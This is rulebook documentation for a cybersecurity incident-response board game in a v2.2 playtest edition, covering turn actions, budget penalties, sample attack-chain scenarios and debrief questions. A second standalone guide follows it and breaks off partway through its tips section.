1. START OF TURN - Apply Uncontained Threats Penalty: For each revealed-but-uncontained threat, deduct 5 Budget from the tracker - Apply Active Breach Cost (v2.2): If at least one chain card is still unrevealed, deduct 5 Budget (the hidden breach is doing damage while you can't see it) - Announce current turn number and budget remaining - Example: "Turn 3. Start-of-turn costs: 5 for your uncontained threat, plus 5 Active Breach Cost—the chain isn't fully mapped yet. Budget drops from 85 to 75."

2. BLUE TEAM'S TURN (2-3 minutes discussion) - Team discusses incident response strategy - Decides on ONE action to take this turn (Investigate, Deploy Defense, or Emergency Response) - Team member announces action and parameters (what they're investigating, which defense they're deploying, etc.)

3. ACTION RESOLUTION - Perform chosen action (see three actions below) - Roll 1d20 if action requires a roll - Apply modifiers (see modifier rules in core-rules.md) - Resolve outcome immediately

4. END OF TURN - Advance Turn Tracker by 1 - Draw 1 new Defense Card (add to hand) - Check if game has been won or lost (see victory/defeat conditions below) - If still playing, return to START OF TURN

Sequential Discovery (v2.2 clarification)

The attack chain is discovered in order: only the earliest unrevealed chain card can be investigated toward or revealed. Clues, investigation successes, and Deploy Defense reveals all target that card until it is face-up, then attention shifts to the next link. This matches how the clue system walks the kill chain.

Deployed Defense Persistence (v2.2)

Deployed defenses stay on the table and keep working. Whenever the chain link currently being targeted has an Attack Vector matching a deployed defense's Countermeasure Vector, add +2 to Investigate and Deploy Defense rolls against that link. The Threat Orchestrator (who knows the hidden vector) announces when this bonus applies—hearing "your deployed defenses are helping here" is itself a useful clue. This rule is stated once here; other sections simply refer to it.


Three Incident Response Actions

Action 1: Investigate 🔎

Cost: 5 Budget per action Roll Required: roll + modifiers ≥ 11 on d20 Special Rule: Modifiers apply and can stack

How It Works:

  1. Team describes what they're investigating (email headers, system logs, network traffic, memory dumps, etc.)
  2. Provide technical justification for your investigation approach
  3. Roll 1d20
  4. Compare: roll + modifiers ≥ 11?

Roll Modifiers:

Bonus When Awarded Examples
+2 Strong technical justification "We're analyzing email headers in the mail gateway logs to identify the true sender IP and check it against threat intelligence feeds. This helps us understand the initial compromise vector."
+1 Real security tools/techniques referenced "We'll query our SIEM for scheduled task creation events" or "We're checking for Mimikatz usage in memory"
+2 Deployed Defense Persistence (v2.2) A deployed defense's vector matches the targeted chain link (see rule above)
+0 Vague investigation "We want to find suspicious activity"

Success (roll + modifiers ≥ 11) — Investigation successes accumulate (v2.2): - First success against a chain link: TO provides a verbal clue about that card (the earliest unrevealed card in the chain) - Second success against the same chain link: THE CARD IS REVEALED! Place it face-up; it becomes uncontained (add 1 to the Uncontained Threats Tracker) and the team chooses a Discovery Reward - Clues should be dramatic and progressive—give more detail with each successful investigation - Budget is spent (5 is deducted)

Failure (roll + modifiers < 11): - "Your investigation yields no actionable intelligence at this time" - Budget is spent anyway (5 is deducted) - Team learns nothing but advances in time - Failure is realistic—not every investigation uncovers information - Failures do NOT count toward the two accumulated successes

Strategic Consideration: - Cheap action (only 5 Budget) - Moderate success chance (need 11+ on d20, so ~50% without bonuses) - Two successful investigations reveal a card without needing the right Defense Card in hand (v2.2) - Deploy Defense (full match) is faster—one successful roll—but costs more and needs the right card


Action 2: Deploy a Defense 🛡️

Cost: 10/15/25 Budget (depending on Defense Card tier: BASIC/ADVANCED/ELITE) Roll Required: roll + modifiers ≥ 11 on d20 Special Rule: Modifiers apply; matching defense to threat reveals cards immediately

How It Works:

  1. Choose a Defense Card from your hand (or any card in your hand)
  2. Target a specific Asset or threat vector (state what you're defending)
  3. Explain your strategy (optional but encouraged for +2 modifier): "Why is this defense appropriate for the current situation?"
  4. Roll 1d20
  5. Compare: roll + modifiers ≥ 11?

Roll Modifiers: Same as Investigate action (+2 for justification, +1 for tools, +2 Deployed Defense Persistence if applicable)

Success (roll + modifiers ≥ 11):

Check if Defense Card matches the earliest unrevealed hidden threat (sequential discovery): - FULL MATCH: Defense Countermeasure Vector matches threat's Attack Vector AND it's the correct step in the chain - THREAT CARD IS REVEALED IMMEDIATELY! Threat card is placed face-up on the table. Blue Team learns what they've been fighting. - Threat card is now "uncontained" (add 1 to Uncontained Threats Tracker) - Defense Card is discarded (used) - Budget is spent

Failure (roll + modifiers < 11): - Defense fails to deploy properly - Budget is spent anyway - Card is discarded - No progress made, but team learns from failure

Key Point: Even "unsuccessful" Defense deployments can be strategically valuable. Deployed defenses stay in play and grant +2 to rolls against later threats that match their vector (v2.2).

Strategic Consideration: - Expensive action (10-25 Budget, scales with defense tier) - Moderate success chance (same 11+ threshold as Investigate) - Two potential rewards: Defense deployment AND card reveal - High-risk/high-reward compared to Investigate

Example Scenario:

Hidden attack chain: Phishing → Lateral Movement → Database Exfil

Team believes phishing is happening (first card).
They deploy D-01 "Email Authentication Setup" (BASIC, 10 Budget).
Email Authentication addresses SOCIAL ENGINEERING vector.

Roll: 8 + 2 (strong justification) = 10 = FAIL
Email deployment fails, 10 Budget spent, card discarded.

Next turn: Same team deploys D-02 "User Security Training" (BASIC, 10 Budget).
Roll: 13 + 1 = 14 = SUCCESS
Defense addresses SOCIAL ENGINEERING vector and is INITIAL COMPROMISE step.
PHISHING CAMPAIGN REVEALED! Threat card placed face-up.
Uncontained Threats increases to 1 (now costing 5 Budget per turn).

Action 3: Emergency Response 🚨

Cost: 15 Budget (v2.2 — repriced from 25; flat cost) Roll Required: None—this always succeeds Special Rule: Only works on previously revealed threats

How It Works:

  1. Choose a revealed Threat Card still in play (face-up on table)
  2. Describe your containment strategy in detail:
  3. Quarantine infected systems
  4. Disable compromised accounts
  5. Isolate network segments
  6. Kill active processes
  7. Revoke stolen credentials
  8. etc.
  9. Pay the 15 Budget cost
  10. Card is immediately removed from play
  11. Uncontained Threats Tracker decreases by 1 (penalty stops for this threat)

Strategic Use Cases:

Example Timeline (one action per turn):

Turn 3: Deploy Defense succeeds → PHISHING revealed → Uncontained Threats = 1
Turn 4: START → Deduct 5 (uncontained) + 5 (Active Breach Cost, 2 cards still hidden)
        ACTION → Emergency Response on Phishing: pay 15 Budget
        → Phishing removed from play, Uncontained Threats = 0
Turn 5: START → Deduct only 5 (Active Breach Cost; no uncontained threats)

Uncontained Threats & Active Breach Cost

These are the core urgency mechanics of Incident Response. Dwell time costs money—whether you can see the threat or not.

How the Uncontained Threats Penalty Works

Step 1: Threat Revealed - When a Threat Card is successfully revealed (by two investigation successes or a full-match defense deployment) - Add 1 to the Uncontained Threats Tracker - This threat is now "active" and dangerous

Step 2: Penalty Applied at Turn Start - At the START of every turn, deduct 5 Budget per uncontained threat - Example: 2 uncontained threats = 10 Budget penalty each turn - This creates continuous pressure—you MUST contain threats or lose resources

Step 3: Auto-Mitigation - When the next card in the attack chain is revealed, the previous uncontained threat is automatically "contained" (represents shift of attention to new priority) - Uncontained Threats Tracker decreases by 1 - Penalties decrease immediately

Step 4: Emergency Response Containment - Team can use Emergency Response action to immediately remove a threat from the board - Cost: 15 Budget (v2.2) - Uncontained Threats Tracker decreases by 1

Active Breach Cost (v2.2)

Example Walkthrough (v2.2 — recomputed)

SETUP: 3-card chain (Phishing → Lateral Movement → Database Exfil)
Budget 100, Turn Limit 7 [(3 × 2) + 1]

Turn 1: START → Active Breach Cost -5 (95). No uncontained threats.
        INVESTIGATE email headers (-5, 90). Roll succeeds.
        → 1st success vs. link 1: clue about the phishing campaign.

Turn 2: START → Active Breach Cost -5 (85).
        INVESTIGATE mail gateway logs (-5, 80). Roll succeeds.
        → 2nd success vs. link 1: ✓ PHISHING CAMPAIGN REVEALED (investigation reveal, v2.2)
        Uncontained Threats = 1. Reward: Budget Grant +10 (90).

Turn 3: START → -5 (uncontained) -5 (Active Breach) = 80.
        INVESTIGATE network logs (-5, 75). Roll succeeds.
        → 1st success vs. link 2: clue about SMB lateral movement.

Turn 4: START → -5 (uncontained) -5 (Active Breach) = 65.
        DEPLOY D-09 Network Segmentation (ADVANCED, -15, 50). Roll succeeds.
        FULL MATCH (NETWORK vector, PIVOT & ESCALATE step)
        → ✓ LATERAL MOVEMENT REVEALED immediately (deploy reveal)
        Phishing auto-mitigates; Lateral Movement now uncontained (still 1 total).
        Reward: Budget Grant +10 (60).

Turn 5: START → -10 (50).
        INVESTIGATE database access logs (-5, 45). Roll fails. No progress.

Turn 6: START → -10 (35).
        INVESTIGATE DLP alerts (-5, 30). Roll succeeds.
        → 1st success vs. link 3: clue about bulk data leaving the database.

Turn 7: START → -10 (20).
        DEPLOY D-11 Data Loss Prevention (ADVANCED, -15, 5). Roll succeeds.
        FULL MATCH (DATA EXFIL vector, C2 & EXFIL step)
        → ✓ DATABASE EXFILTRATION REVEALED — final card!
        Victory is checked IMMEDIATELY (before any start-of-turn penalties).

WIN on the final turn with 5 Budget remaining.

(Arithmetic check, turn by turn: 100 → 95 → 90 | 85 → 80 → +10 = 90 | 80 → 75 | 65 → 50 → +10 = 60 | 50 → 45 | 35 → 30 | 20 → 5.)


Winning & Losing

Victory Condition ✓

Blue Team wins Incident Response if: 1. ALL threat cards in the attack chain are revealed (face-up on table), AND 2. This happens within the turn limit (7/9/11 by chain length, per Core Rules §3a)

Victory is checked immediately when the final card is revealed (v2.2) — before any start-of-turn penalties would apply. Revealing the last card on your final turn with 0 Budget remaining is still a win.

Defeat Condition ✗

Blue Team loses Incident Response if: 1. Turn Tracker exceeds the turn limit with unrevealed cards remaining, OR 2. The team cannot take any legal action (see Budget Edge Rules below)

Losing Scenarios: - Turns expired with only 2 of 4 cards revealed = attack succeeded - Budget too low to afford any action = response ran out of resources

Budget Edge Rules (v2.2)

Victory Scoring (Optional)

If you want to measure quality of victory:

Victory Points Formula:
Points = (Cards Revealed / Total Cards) × 50 + (Budget Remaining / Starting Budget) × 50

Examples:
- 4 of 4 cards revealed, 35 Budget remaining: (4/4 × 50) + (35/100 × 50) = 50 + 17.5 = 67.5/100 (Victory with good efficiency)
- 3 of 4 cards revealed, 15 Budget remaining: (3/4 × 50) + (15/100 × 50) = 37.5 + 7.5 = 45/100 (Partial victory, struggled)
- 2 of 4 cards revealed, 0 Budget: (2/4 × 50) + (0 × 50) = 25/100 (Defeat)

Discovery Rewards

When your team successfully reveals a Threat Card, immediately choose ONE of these rewards:

Reward Option 1: Intelligence Bonus 📚

Reward Option 2: Budget Grant 💰

Reward Option 3: Fast-Track Investigation 🚀

Important: Choose only ONE reward per card reveal. Cannot combine rewards.


Debrief & Reflection (5-10 minutes)

Every game should conclude with guided reflection connecting game mechanics to real security concepts.

For Winners (Questions about Success)

  1. "What was your investigation strategy? What worked best?"
  2. Explore which investigation themes were most successful
  3. Discuss whether they targeted the right logs/evidence first

  4. "Which action type was most effective for you—Investigate or Deploy Defense?"

  5. Some teams succeed with heavy investigation, others with defense-focused discovery
  6. Both are valid; discuss trade-offs (v2.2: investigation reveals need two successes but cost less)

  7. "How did the Uncontained Threats penalty and Active Breach Cost affect your decisions?"

  8. Did they force you to make reactive decisions?
  9. Were they realistic representations of incident response and dwell-time costs?

  10. "If you replayed, what would you do differently?"

  11. Reflection on optimization and efficiency
  12. Planning better strategies for next playthrough

For Losers (Questions about Learning)

  1. "What went wrong in your investigation? Where did you get stuck?"
  2. Identify which threat was hardest to detect and why
  3. Discuss investigation approaches that didn't work

  4. "Would you have benefited from more defense deployments vs. investigations?"

  5. Analyze if budget allocation strategy was optimal
  6. Discuss risk/reward trade-offs

  7. "How would you investigate differently if you could replay?"

  8. Recovery and learning from failure
  9. Strategic adjustments for next attempt

  10. "What was the attacker's complete kill chain?"

  11. TO reveals the full hidden attack chain (all cards, clues, explanations)
  12. Discussion of what signals should have tipped them off

For Everyone (Real-World Connection)

  1. "What was the attacker's complete kill chain? Which step was most critical?"
  2. Understand the full attack story
  3. Discuss which card took longest to detect and why

  4. "Why isn't this easy to detect in real-world networks?"

  5. Real attacks hide in massive volumes of legitimate traffic
  6. Attackers use living-off-the-land techniques
  7. Detection requires specific telemetry (EDR, SIEM, network monitoring)

  8. "What tool or process would have helped you detect faster?"

  9. Threat hunting
  10. Behavioral analytics
  11. Specific log sources (PowerShell logs, Sysmon, Zeek)
  12. User and Entity Behavior Analytics (UEBA)

  13. "How does game dwell time compare to real breaches?"

  14. Average dwell time in real breaches: 200+ days
  15. Game represents 2-8 hours of focused investigation
  16. The Active Breach Cost models why every day of dwell time hurts

Tips for Threat Orchestrators

Before the Game (Preparation)

  1. Read the module rules completely - Understand Investigate, Deploy Defense, and Emergency Response mechanics
  2. Prepare your attack chain - Pre-build or write down your 3-5 hidden cards in sequence
  3. Write clear clues - For each card, write 2-3 progressive clues that reveal information gradually (v2.2: expect up to two clue deliveries per card before an investigation reveal)
  4. Organize materials - Sort Defense Cards by tier, prepare trackers, have dice ready
  5. Practice reading clues dramatically - Deliver them with narrative flair to create engagement

Crafting Effective Clues

Poor clue (too vague, gives nothing away): - "You find something suspicious" - "There's a threat somewhere"

Bad clue (gives it away completely): - "The attacker used Mimikatz to dump credentials from LSASS memory" - "You have a database exfiltration happening right now"

Good clue (progressive disclosure, dramatic delivery): - "Your memory forensics shows suspicious LSASS process manipulation. A tool has dumped credential hashes from memory. Several cached domain admin credentials have been extracted."

Excellent clue (specific without revealing, creates narrative): - "Your EDR shows PowerShell activity with suspicious encoding. Memory access patterns suggest credential harvesting. Your domain admin cached credentials appear to have been targeted."

Balancing Difficulty During Play

The game is TOO EASY if: - Team reveals all cards in the first half of the turn limit with 60+ Budget remaining - Multiple consecutive successful rolls (unlikely with d20) - Clues are too specific/obvious - Team makes no difficult decisions

Action: Make clues more subtle, reduce starting budget next time, or add extra card to chain

The game is TOO HARD if: - Team gets stuck after revealing only 1 card (4+ turns with no progress) - Multiple consecutive failed rolls - Team is frustrated rather than challenged - Team is out of ideas about what to investigate

Action: Provide more explicit clues, increase starting budget, reduce chain length

Adjustment Options: - Chain Length: 3 (easier) vs. 4 (medium) vs. 5 (harder) — the turn limit scales automatically via (chain × 2) + 1 - Clue Quality: More specific/obvious (easier) vs. subtle (harder) - Starting Budget: 80 (harder) vs. 100 (medium) vs. 120 (easier) - Turn Limit: formula −1 (harder) vs. formula (medium) vs. formula +1 (easier)

Running Competitive Games (Multiple Teams)

If running for tournament or competitive context:

  1. Assign different attack chains to each team (or same chain for scoring comparison)
  2. Teams cannot see each other's progress (prevents copying strategies)
  3. Scoring: First team to reveal all cards wins; tiebreaker is most Budget remaining
  4. Set clear turn/budget limits before game starts
  5. Track publicly so teams know they're racing against time/budget

Sample Scenarios to Try

Scenario 1: "Startup Breach" (Beginner, 3 cards, 30 minutes)

Attack Chain: 1. T-01: Phishing Campaign (INITIAL COMPROMISE - SOCIAL ENGINEERING) 2. T-06: Mimikatz Credential Dumping (PIVOT & ESCALATE - CREDENTIAL ABUSE) 3. T-10: SQL Database Exfiltration (C2 & EXFIL - DATA EXFIL)

Starting Budget: 100 Turn Limit: 7 [(3 × 2) + 1]

Narrative Setup:

"Your startup just deployed a new customer database. An employee clicked a malicious link in an email claiming to be from IT. Security monitoring detected unusual PowerShell activity after that. Now you're investigating what happened."

Focus: Teaching full kill chain detection (initial → credential harvesting → data theft) Expected Duration: 30 minutes Best For: First-time players, classroom introduction

Sample Defenses in Starting Hand: - D-01: Email Authentication Setup (BASIC, 10) - D-02: User Security Training (BASIC, 10) - D-07: Multi-Factor Authentication (ADVANCED, 15) - D-08: EDR (Endpoint Detection & Response) (ADVANCED, 15) - D-11: Data Loss Prevention (ADVANCED, 15)


Scenario 2: "Nation-State Campaign" (Intermediate, 4 cards, 40 minutes)

Attack Chain: 1. T-02: Watering Hole Attack (INITIAL COMPROMISE - WEB EXPLOIT) 2. T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK) 3. T-07: Scheduled Task Persistence (PERSISTENCE - MALWARE) 4. T-09: Beaconing to C2 Server (C2 & EXFIL - NETWORK)

Starting Budget: 100 Turn Limit: 9 [(4 × 2) + 1]

Narrative Setup:

"Your organization's industry-specific website was silently compromised last month. A sophisticated attacker injected malicious code that targeted specific visitor browsers. One of your engineers visited the site and became infected. You're detecting strange network activity but aren't sure what's happening."

Focus: Sophisticated attack with multiple detection points; requires multiple defense/investigation attempts Expected Duration: 40 minutes Best For: Experienced players, demonstrating complex kill chain

Sample Defenses: - D-18: Intrusion Prevention System (IPS) (ADVANCED, 15) - D-09: Network Segmentation (ADVANCED, 15) - D-04: Network Firewall Rules (BASIC, 10) - D-08: EDR (Endpoint Detection & Response) (ADVANCED, 15) - D-13: Threat Hunting Program (ELITE, 25) - D-14: Memory Forensics (ELITE, 25)


Scenario 3: "Advanced Ransomware Supply Chain" (Advanced, 5 cards, 45 minutes)

Attack Chain: 1. T-13: Compromised Software Vendor Update (INITIAL COMPROMISE - MALWARE) 2. T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK) 3. T-05: Privilege Escalation via Kernel Exploit (PIVOT & ESCALATE - MALWARE) 4. T-09: Beaconing to C2 Server (C2 & EXFIL - NETWORK) 5. T-11: Ransomware Payload Deployment (C2 & EXFIL - MALWARE)

Starting Budget: 100 Turn Limit: 11 [(5 × 2) + 1]

Narrative Setup:

"A trusted software vendor released an update to your monitoring tools three weeks ago. Today, you're detecting ransomware-like activity across your infrastructure. You suspect the vendor update was compromised. Can you trace the attack chain before the ransomware wakes up?"

Focus: Complex supply-chain-initiated attack; requires pattern recognition; high pressure Expected Duration: 45 minutes Best For: Advanced players, demonstrating supply chain risk

Sample Defenses: - D-17: Advanced Malware Sandbox (ELITE, 25) — detonates vendor updates before deployment - D-08: EDR (Endpoint Detection & Response) (ADVANCED, 15) - D-09: Network Segmentation (ADVANCED, 15) - D-03: Windows Update Patching (BASIC, 10) — closes the kernel exploit - D-14: Memory Forensics (ELITE, 25) - D-19: Backup & Disaster Recovery (BASIC, 10) - D-11: Data Loss Prevention (ADVANCED, 15)


Extensions & Variations

Variation 1: Solo Play Mode

How to Play Solo: - Single player acts as both Blue Team AND Threat Orchestrator - Orchestrator creates attack chain before game starts - Orchestrator then "steps back" to investigate (hard mode: don't peek at hidden cards) - Requires discipline: don't use knowledge of chain to guide rolls

Best For: Individual learning, skill practice


Variation 2: Speed Mode

Compress the Game: - Reduce the turn limit by 2 (e.g., a 3-card chain plays in 5 turns instead of 7) - Optional: Remove Uncontained Threats penalty and Active Breach Cost (less bookkeeping) - Budget costs stay the same - Budget starts at 120 to balance speed pressure

Best For: Experienced teams wanting high-stakes challenge


Variation 3: Extended Investigation (Advanced)

Deeper Forensics: - Add "Advanced Investigate" action (costs 15 Budget, rolls 11+) - A successful Advanced Investigate counts as TWO accumulated investigation successes (i.e., it can reveal a link in one action if you already have a clue, v2.2) - Allows for riskier but more rewarding investigation strategy

Best For: Players who want forensic investigation to feel more rewarding


Variation 4: Competitive Tournament

Multiple Teams, Same Challenge: 1. All teams receive the same 4-card attack chain 2. All teams start with same 100 Budget, same 5 Defense Cards drawn 3. Teams play simultaneously (or in sequence) against same scenario 4. Scoring: Cards revealed + Budget remaining = final score 5. Tiebreaker: Fewest turns taken

Best For: Classroom competition, conference play, benchmarking


Next Steps After This Module

If You Won (Completed All Cards)

Option 1: Continue to Hardening Module - Excellent choice if building defenses against discovered threats - Use the attack chain you just discovered as the hardening context - Natural progression: detect the attack → now prevent it

Option 2: Continue to Audit & Compliance Module - Great for understanding how to detect this attack chain - Validates that your detection methods work - Audits your existing security controls

If You Lost (Time/Budget Expired)

Option 1: Continue to Disaster Recovery Module - Appropriate: assume the attack succeeded - Manage the breach that just happened - Focus on response, stakeholder communication, recovery

Option 2: Replay with Different Strategy - Try again with different investigation/defense approach - Use what you learned to optimize for next attempt

Option 3: Study Real Breach Case Studies - Compare your experience to real breaches (Equifax, Target, SolarWinds) - Understand why real dwell times are 200+ days - Learn what signals real defenders look for

Standalone Play

Play Again with: - Different attack chain from the card deck - Different difficulty (if you won easily or struggled) - Competitive mode against other teams - Extended variations with different mechanics


Quick Reference: Actions & Costs

Action Cost Roll Required Success Condition Failure Condition
Investigate 5 Budget roll + modifiers ≥ 11 1st success: clue; 2nd success on same link: card revealed (v2.2) No intel gained
Deploy Defense 10/15/25 roll + modifiers ≥ 11 Full match reveals card immediately Defense not deployed
Emergency Response 15 Budget (v2.2) None Threat removed, penalty stops

Quick Reference: Modifiers

Bonus When Awarded Examples
+2 Strong technical justification "Analyze mail headers in gateway logs to identify true sender IP, check against threat intelligence"
+1 Real security tools/techniques "Query SIEM for scheduled tasks", "Check Mimikatz in memory", "Review EDR telemetry"
+2 Deployed Defense Persistence (v2.2) A deployed defense's vector matches the targeted chain link
+0 Vague/no justification "Find suspicious activity"

Quick Reference: Trackers

Tracker Starts At Changes
Budget 100 -5 per Investigate, -10/15/25 per Defense, -15 per Emergency Response, -5 per uncontained threat at turn start, -5 Active Breach Cost at turn start while any chain card is unrevealed (v2.2); floor 0
Turn 1 +1 each turn (limit = chain × 2 + 1)
Uncontained Threats 0 +1 when card revealed, -1 when auto-mitigated or Emergency Response used

v2.2 Playtest Edition Changes

Changes for playtesters to validate, and why they were made:

  1. Investigation reveals (accumulating successes). The first successful Investigation of a chain link yields a clue; a second successful Investigation of that same link reveals the card. Deploy Defense full-match still reveals immediately. Previously only defense deployment could reveal cards, contradicting the overview text. Validate: does investigation-led play feel viable but slower than defense-led play?
  2. Deployed Defense Persistence. A deployed defense grants +2 to Investigate/Deploy rolls against any chain link matching its vector. Partial/no-match deployments now have lasting value.
  3. Active Breach Cost. −5 Budget at the start of each turn while at least one chain card is unrevealed. Fixes the inversion where hidden threats were free; teaches that dwell time costs money.
  4. Economy rebalance: Budget Grant reward reduced +15 → +10; Emergency Response repriced 25 → 15 Budget.
  5. Budget edge rules: Budget floors at 0; actions require full cost; victory is checked immediately on the final reveal (before start-of-turn penalties); defeat at 0 only if no legal action exists.
  6. Turn limits use the Variable Game Length formula (chain × 2) + 1 → 7/9/11 turns, replacing the fixed 12/10/10 table (see Core Rules §3a).
  7. Sequential discovery clarified: only the earliest unrevealed chain card can be revealed.
  8. Content fixes: sample-defense lists now cite real card IDs from the canonical 24-card deck (D-01–D-24); D-11 DLP correctly listed as ADVANCED/15.

Rough balance check (3-card beginner game, 7 turns): worst-case fixed costs are 5/turn Active Breach + 5/turn for one uncontained threat ≈ 60-70 Budget over a full game, leaving ~30-40 for actions before rewards; two Budget Grants (+20) and cheap Investigates (5) keep an investigation-led run solvent — see the worked example above, which ends at 5 Budget on turn 7.


Need Help?


Incident Response Module - Rules & Mechanics Part of Incident Zero, a modular cybersecurity board game v2.2 - Playtest Edition

docs/standalone-games/incident-response.md

Incident Response Module: Standalone Play Guide

Version: 2.2 - Playtest Edition Duration: 30-45 minutes Players: 1 Threat Orchestrator + 2-4 Blue Team members Best For: Incident response training, attack detection practice, SOC operations


Module Overview

The Incident Response Module teaches players how to detect and investigate cyberattacks under pressure. Players must reveal a hidden attack chain before time runs out or budget is exhausted.

This is the foundation module—many other modules build upon successful or unsuccessful incident response.


Setup (5 minutes)

1. Choose Difficulty Level

Turn limits use the Variable Game Length formula from Core Rules §3a: Turn Limit = (Attack Chain Cards × 2) + 1.

Difficulty Chain Length Budget Turn Limit Best For
Beginner 3 cards 100 7 turns First playthrough, basic learning
Intermediate 4 cards 100 9 turns Standard play, mixed experience
Advanced 5 cards 100 11 turns Experienced players, challenge

2. Threat Orchestrator Preparation

Create the Attack Chain: 1. Select 3-5 threat cards in logical sequence 2. Arrange by attack chain step: INITIAL COMPROMISE → PIVOT & ESCALATE → PERSISTENCE → C2 & EXFIL 3. Write down clues for each hidden card (don't reveal yet) 4. Place relevant Asset Cards on the table (visible to all). Asset Cards are shared components — see cards/network-building/core-deck/asset-cards.md

Recommended first-time scenario: - T-01: Phishing Campaign (INITIAL COMPROMISE - SOCIAL ENGINEERING) - T-04: Lateral Movement via SMB (PIVOT & ESCALATE - NETWORK) - T-10: SQL Database Exfiltration (C2 & EXFIL - DATA EXFIL) - Total: 3 cards, ~30 minutes, teaches full attack chain concept

3. Blue Team Setup

4. Read the Opening Scenario

Threat Orchestrator reads opening scenario based on only the first hidden card's clue. Example:

"Your security operations center is monitoring the network when alerts begin firing. Your SIEM shows suspicious email traffic coming from your IT department domain, but the headers look spoofed. Several employees have reported clicking links in emails they thought came from IT requesting password resets."


Gameplay Loop (25-35 minutes)

Round Structure

Each turn follows this structure:

1. START OF TURN - Uncontained Threats Penalty: For each revealed-but-uncontained threat, deduct 5 Budget - Active Breach Cost (v2.2): If at least one chain card is still unrevealed, deduct 5 Budget (dwell time is never free) - Read turn number aloud ("Turn 3...")

2. BLUE TEAM'S TURN (2-3 minutes discussion) - Team discusses strategy - Decides on ONE action (see below) - Announces action and parameters

3. ACTION RESOLUTION - Roll 1d20 for success/failure - Apply modifiers (see below) - Determine outcome

4. END OF TURN - Advance Turn Tracker by 1 - Draw 1 Defense Card - Check if game won/lost

Three Available Actions

Action 1: Investigate 🔎

Cost: 5 Budget Roll Required: 11+ (on d20)

How it works: 1. Team describes what they're investigating (e.g., "Email headers in the mail gateway logs") 2. Provide technical justification for the investigation approach 3. Roll 1d20

Roll Modifiers: - +2 bonus: Strong technical justification (references specific logs, tools, or methodologies) - +1 bonus: References real security tools/techniques (Splunk, Wireshark, EDR, specific CVEs, MITRE ATT&CK) - No modifier: Vague investigation (0 to +0)

Examples of good justification: - "We want to analyze the email headers in the mail gateway to identify the true sender IP and check it against threat intelligence feeds" - "We'll query our EDR agent logs for any processes spawned after the user clicked the link, looking for PowerShell or suspicious child processes"

Outcomes (v2.2 — investigation successes accumulate): - Success (roll + modifiers ≥ 11): - First success against the current chain link: TO gives a verbal clue about that hidden threat (always the earliest unrevealed card — see Sequential Discovery below) - Second success against the same link: THE CARD IS REVEALED! It becomes uncontained and the team chooses a Discovery Reward - Failure: "Your investigation yields no actionable intelligence" (turn wasted, budget spent, but team learned). Failures do not count toward the two successes.

Sequential Discovery (v2.2 note): Only the earliest unrevealed chain card can be revealed — by investigation or by defense deployment. Clues and successes always target that card, matching the clue system's walk down the kill chain.


Action 2: Deploy a Defense 🛡️

Cost: 10/15/25 Budget (depending on card tier) Roll Required: 11+ (on d20)

How it works: 1. Choose a Defense Card from your hand 2. Target a specific Asset or threat vector 3. Explain why this defense is appropriate for the situation 4. Roll 1d20

Roll Modifiers: Same as Investigate (+2 for justification, +1 for real tools)

Outcomes: - Success (roll + modifiers ≥ 11): - If card's Countermeasure matches the hidden threat's Attack Vector AND it's the correct step in the chain → THREAT CARD REVEALED IMMEDIATELY! - If it matches but wrong step, or right step but wrong vector → Defense deployed but no reveal - If neither matches → Defense deployed but ineffective against current threat

Deployed Defense Persistence (v2.2): Deployed defenses stay on the board. Whenever the chain link currently being targeted has a vector matching a deployed defense, add +2 to Investigate and Deploy Defense rolls against it (the TO, who knows the hidden vector, announces when this applies). Full rule in Module: Incident Response.


Action 3: Emergency Response 🚨

Cost: 15 Budget (v2.2 — repriced from 25) Roll Required: None—this always succeeds

How it works: 1. Choose a previously revealed Threat Card still in play 2. Describe your containment strategy (quarantine infected systems, disable compromised accounts, isolate network segments, etc.) 3. Card is immediately removed from play 4. Uncontained Threats penalty decreases by 1

Strategic Use: - Use this if you're running out of budget and accumulating penalties - Use this if a threat is too dangerous to leave active - Use this to prepare for later modules (e.g., if continuing to Hardening, fewer contained threats = more budget available)


Uncontained Threats Penalty & Active Breach Cost

How it works: 1. When a threat card is revealed, it becomes "uncontained" (add 1 to Uncontained Threats Tracker) 2. At the START of each turn, deduct 5 Budget per uncontained threat 3. Active Breach Cost (v2.2): at the START of each turn, also deduct 5 Budget if at least one chain card is still unrevealed (hidden dwell time costs money too) 4. When Emergency Response is used, remove that threat and decrement the tracker 5. When the next card in the chain is revealed, the previous uncontained threat is automatically "mitigated" (decrement tracker)

Example (one action per turn; 3-card chain; Budget 100):

Turn 1: START → -5 Active Breach Cost (95)
        Deploy Defense succeeds, full match → PHISHING REVEALED
        (-10 for the BASIC defense, 85) → Uncontained Threats = 1
        Reward: Budget Grant +10 (95)
Turn 2: START → -5 (uncontained) -5 (Active Breach: 2 cards hidden) = 85
        Emergency Response on Phishing: pay 15 (70) → Uncontained = 0
Turn 3: START → -5 (Active Breach only) = 65
        ...investigation continues toward the next chain card

Winning & Losing

Victory Condition ✓

Blue Team Wins if: - All threat cards in the attack chain are revealed - AND this happens within your turn limit (7/9/11 by chain length)

Victory is checked immediately when the final card is revealed (v2.2) — before any start-of-turn penalties.

Defeat Condition ✗

Blue Team Loses if: - Turn Tracker exceeds your turn limit with unrevealed cards remaining - OR the team cannot afford any legal action (Budget floors at 0; an action requires its full cost — see Budget Edge Rules in Module: Incident Response)

Scoring (Optional)

If you want to score:

Points = (Cards Revealed / Total Cards) × 50 + (Budget Remaining / 100) × 50

Example (4-card chain):
- 3 cards revealed: 37.5 points
- 35 budget remaining: 17.5 points
- Total: 55/100 (moderate performance)

Discovery Rewards

When your team successfully reveals a Threat Card:

Choose ONE reward:

  1. Intelligence Bonus: Draw 2 additional Defense Cards (keep both)
  2. Budget Grant: Gain +10 Budget (v2.2 — reduced from +15; represents management approval of your response)
  3. Fast-Track: On your next Investigate action, you succeed on 5+ instead of 11+ (still costs 5 Budget, still need justification modifiers)

Debrief & Reflection (5-10 minutes)

FOR WINNERS: 1. "What was your investigation strategy? What worked?" 2. "Which action type (Investigate vs. Deploy Defense) was most effective for you?" 3. "Did Uncontained Threats penalties force you to make reactive decisions? Was that realistic?"

FOR LOSERS: 1. "What went wrong in your investigation? Where did you get stuck?" 2. "Would you have benefited from more defense deployments vs. investigations?" 3. "How would you investigate differently if you could replay?"

EVERYONE: 1. "What was the attacker's complete kill chain?" 2. "Which threat card was hardest to detect? Why?" 3. "Why isn't this easy to detect in real-world networks?" 4. "What tool or process would have helped you detect faster?"


Tips for Threat Orchestrators

Creating Effective Clues

Poor clue (too vague): - "You find something suspicious"

